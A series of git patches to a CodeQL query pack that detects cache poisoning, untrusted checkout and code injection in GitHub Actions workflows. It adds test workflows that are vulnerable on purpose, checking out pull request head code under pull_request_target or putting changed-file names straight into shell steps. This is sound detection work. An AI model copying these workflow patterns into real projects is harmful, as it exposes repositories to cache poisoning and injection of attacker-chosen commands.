mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a9a28227957..6668ef9777d 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -21,7 +21,14 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { } class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { this.getCallee() = "actions/setup-go" } + SetupGoUsesStep() { + this.getCallee() = "actions/setup-go" and + ( + not exists(this.getArgument("cache")) + or + this.getArgument("cache") = "true" + ) + } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -48,7 +55,7 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { SetupDotnetUsesStep() { this.getCallee() = "actions/setup-dotnet" and ( - exists(this.getArgument("cache")) or + this.getArgument("cache") = "true" or exists(this.getArgument("cache-dependency-path")) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index ac51e58ff4b..e0d59a02ab4 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -14,8 +14,9 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps -from LocalJob j +from LocalJob j, PRHeadCheckoutStep checkout where // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) @@ -29,7 +30,14 @@ where "repository_dispatch", "schedule", "watch", "workflow_run" ]) and // The job checkouts untrusted code from a pull request - j.getAStep() instanceof PRHeadCheckoutStep and - // The job writes to the cache - j.getAStep() instanceof CacheWritingStep + j.getAStep() = checkout and + ( + // The job writes to the cache + // (No need to follow the checkout step as the cache writing is normally done after the job completes) + j.getAStep() instanceof CacheWritingStep + or + // The job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + checkout.getAFollowingStep() instanceof PoisonableStep + ) select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml new file mode 100644 index 00000000000..9bc6cc98056 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: false + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml new file mode 100644 index 00000000000..b5ef835210b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: true + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml new file mode 100644 index 00000000000..d0ff8c180fe --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -0,0 +1,16 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index b791a440a6e..6e0030ad383 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,5 @@ | .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | From 373e0a278af4bbe7551a271ded09c6e72705ac62 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:36:46 +0200 Subject: [PATCH 0235/1267] Rename untrusted checkout queries --- ...dCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} | 2 +- ...tedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename ql/src/Security/CWE-829/{UntrustedCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} (95%) rename ql/src/Security/CWE-829/{UntrustedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} (95%) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutError.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 604acf71cc7..5c0528c4551 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -7,7 +7,7 @@ * @problem.severity error * @precision high * @security-severity 9.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/critical * @tags actions * security * external/cwe/cwe-829 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index d8dfd69ad28..e45075552ab 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -7,7 +7,7 @@ * @problem.severity warning * @precision medium * @security-severity 5.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/high * @tags actions * security * external/cwe/cwe-829 From 254664d2747daf4fc1910b33c5cd3cdf2b8627cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:39:15 +0200 Subject: [PATCH 0236/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 380cfdbd858..f07d6c40046 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.20 +version: 0.0.21 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c5a94e35d4b..13f053a40da 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.20 +version: 0.0.21 groups: - actions - queries From c3c6410a73033d86e2ede33a3cec958d19f29609 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 20:01:48 +0200 Subject: [PATCH 0237/1267] Update action.yml --- .github/action/dist/index.js | 11 +++-------- .github/action/src/codeql.ts | 13 +++---------- action.yml | 14 +++----------- 3 files changed, 9 insertions(+), 29 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4a60299ef0f..0911555e292 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28706,14 +28706,9 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "") { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 842af1c8b17..ea1d731c935 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -147,16 +147,9 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if ( - extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "" - ) { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack diff --git a/action.yml b/action.yml index 35c423e103d..24453e893ee 100644 --- a/action.yml +++ b/action.yml @@ -14,12 +14,6 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - workflow-extpack-path: - description: "Path to Workflow extpack" - required: false - workflow-extpack-name: - description: "Name of the Workflow extpack" - required: false runs: using: 'composite' @@ -27,14 +21,14 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} + EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 + EXTPACK_NAME: local/workflow-models run: | echo "##[group] Workflow Models" if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi echo "##[endgroup]" - name: Scan workflows @@ -45,7 +39,5 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 0ea34dfb528c914602c8cdf2adc35768a725a786 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:11:43 +0200 Subject: [PATCH 0238/1267] Update action.yml --- action.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 24453e893ee..151c909fb8b 100644 --- a/action.yml +++ b/action.yml @@ -14,12 +14,19 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" + packs: + description: >- + Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not + specified, then the latest version of the pack is used. By default, this overrides the same setting in a + configuration file; prefix with "+" to use both sets of packs. + required: false runs: using: 'composite' steps: - name: extpack contents shell: bash + if: inputs.packs env: EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 EXTPACK_NAME: local/workflow-models @@ -28,7 +35,7 @@ runs: if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi echo "##[endgroup]" - name: Scan workflows @@ -39,5 +46,6 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + INPUT_PACKS: ${{ inputs.packs }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 1ddfbb05f36adcb32f4415a9a7b9a145edfe2094 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:19:02 +0200 Subject: [PATCH 0239/1267] Update actions fragment --- .github/action/dist/index.js | 6 +++--- .github/action/src/codeql.ts | 9 ++++++--- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 0911555e292..8ff1e7759d2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28610,6 +28610,7 @@ async function newCodeQL() { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } exports.newCodeQL = newCodeQL; @@ -28706,9 +28707,8 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ea1d731c935..76eacd6eb67 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -18,6 +18,8 @@ export interface CodeQLConfig { source_root?: string; // The output file for the SARIF file. output?: string; + // Extension CodeQL packs to use for analysis. + packs: string | undefined; } export async function newCodeQL(): Promise { @@ -28,6 +30,8 @@ export async function newCodeQL(): Promise { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: + core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } @@ -147,9 +151,8 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack From ddf4bb194ef1562a45ad17d5a1066f88021f23c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:06 +0200 Subject: [PATCH 0240/1267] Fix incorrect source for dorny path filters --- .../codeql/actions/dataflow/FlowSources.qll | 17 ++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 20 ++++++ ql/lib/ext/dorny_paths-filter.model.yml | 6 -- ql/test/library-tests/test.expected | 1 - .../CWE-094/.github/workflows/test2.yml | 64 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 ++ .../CWE-094/PrivilegedCodeInjection.expected | 8 +++ 7 files changed, 114 insertions(+), 8 deletions(-) delete mode 100644 ql/lib/ext/dorny_paths-filter.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 580fb1d25ab..db111b9e190 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -252,10 +252,25 @@ class CompositeActionInputSource extends RemoteFlowSource { } /** - * A downloadeded artifact. + * A downloaded artifact. */ private class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } } + +/** + * A list of file names returned by dorny/paths-filter. + */ +private class DornyPathsFilterSource extends RemoteFlowSource { + DornyPathsFilterSource() { + exists(UsesStep u | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b24f9484a80..32c329d8c67 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -124,3 +124,23 @@ class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { artifactDownloadToUseStep(node1, node2) } } + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesStep u, StepsExpression o | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + u = pred.asExpr() and + o.getStepId() = u.getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +class DornyPathsFilterTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) + } +} diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml deleted file mode 100644 index 79621a6a30c..00000000000 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5bd009b31b0..d7f944c5a3d 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -438,7 +438,6 @@ sources | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| dorny/paths-filter | * | output.changes | filename | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml new file mode 100644 index 00000000000..03ee63fe9cf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -0,0 +1,64 @@ +name: List files + +on: + pull_request_target: + types: [ opened, synchronize, workflow_dispatch] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed + with: + list-files: json + filters: | + locale: + - '*.xml' + - name: Changed files 1 + run: | + echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed2 + with: + list-files: csv + filters: | + locale: + - '*.xml' + - name: Changed files 2 + run: | + echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed: ${{ steps.changed2.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed3 + with: + list-files: shell + filters: | + locale: + - '*.xml' + - name: Changed files 3 + run: | + echo changed:${{ steps.changed3.outputs.locale_files }} + echo changed: ${{ steps.changed3.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed4 + with: + list-files: escape + filters: | + locale: + - '*.xml' + - name: Changed files 4 + run: | + echo changed:${{ steps.changed4.outputs.locale_files }} + echo changed: ${{ steps.changed4.outputs.changes }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 50cb0c40d24..e220d368b20 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9068ef92715..1c4ab8a61cf 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -319,6 +325,8 @@ subpaths | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From b22e305699b1a3e56cb20dcf05db14ae8ece50d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:42 +0200 Subject: [PATCH 0241/1267] Fix untrusted checkout tests --- ...or.expected => PrivilegedUntrustedCheckoutCritical.expected} | 0 .../Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref | 1 + ...arning.expected => PrivilegedUntrustedCheckoutHigh.expected} | 2 +- .../Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref | 1 + .../query-tests/Security/CWE-829/UntrustedCheckoutError.qlref | 1 - .../query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref | 1 - 6 files changed, 3 insertions(+), 3 deletions(-) rename 